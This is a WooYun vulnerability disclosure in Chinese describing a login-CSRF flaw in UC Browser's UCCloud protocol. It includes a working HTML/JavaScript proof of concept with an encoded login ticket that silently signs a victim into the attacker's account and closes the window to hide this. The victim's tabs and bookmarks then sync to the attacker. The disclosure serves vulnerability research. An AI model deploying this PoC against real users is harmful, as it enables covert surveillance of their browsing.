WooYun.org

之前测试http://**.**.**.**/bugs/wooyun-2010-0154403这个洞的时候，发现了UC浏览器一个和帐号登陆有关的协议UCCloud
在使用第三方帐号比如QQ登陆UC浏览器时，登陆完成后会返回一个authorize code，UC验证该authorize code有效之后会生成一个ticket，然后使用UCCloud协议来登陆帐号。

UCCloud://ext:cs:userlogin:后面的内容先base64 decode之后在传给nativeM9Decode方法解码。
通过hook可以看到解码后的内容为用户名，uid，ticket等

ticket的有效时间很长，至少我测试是过了10多个小时依然有效。所以就可以通过UCCloud协议让别人登陆你的帐号来同步数据。
要得到登陆时base64 encode的内容也很简单，因为UC浏览器直接在logcat输出了，连hook都不用。

或者更简单，用下面的url在电脑登陆就行。
http://**.**.**.**/cgi-bin/xlogin?appid=716027609&pt_3rd_aid=100468196&style=35&s_url=http%3A%2F%2F**.**.**.**&refer_cgi=authorize&which=&response_type=code&client_id=100468196&redirect_uri=http%3A%2F%2F**.**.**.**%2Fcas%2Fthirdparty%2Fauthorize&display=mobile&state=client_id%3D72%26third_party_name%3Dqq%26isbrowser%3D1
为了更隐蔽可以使用ext:close_window在登陆成功后关闭窗口，POC如下：

<h1>DEMO</h1>
<script>
window.location = "UCCloud://ext:cs:userlogin:bTkwAKNolSRgB8i+UyjkCbWhycXmdENgS3a6BfKJLtuxhmeim7Pcveq2e45P3D70pBfRIk9l/6VnTCYTjZqk48waDfWHGDb1wjBtaYJ2lQfUzGSzRi6pJLUtpIR4GRgP+dulerAm5WzhtlCW/8pbV5weF8+p0ErP3pG+ZF6M89DENfWWEIkX/ssiutyB6YWJa9snIcW6uYplOX3LgkZN7DuWiyx2f68WbrmfEj8IREwcDEedCE9uYlf3NWffJ6FBWA1oLc7BVxBzK+WEIeo3PnKP+Wgk9pPMYG1QVhGQfr47zRmOnfaP8VH6zyC5G7mdBU/YUj5MH6tI2onwJRLa37PyBUAABCYo8lRCPtpsIyHqt8iNpDSAH/Q0yVF+hwwZz2YcMhbpjFCf7UyuBoH5coQkKHC2+U+PqKPiO7bGkbuhw+iNLjnFlbUFG29ebHCa6Kh/GxMZl6iyog==";
setInterval("window.location='ext:close_window'",100);
</script>

登陆之后会自动同步书签和标签页等内容到云端，查看云标签页就可以看到用户当前正在浏览的网页。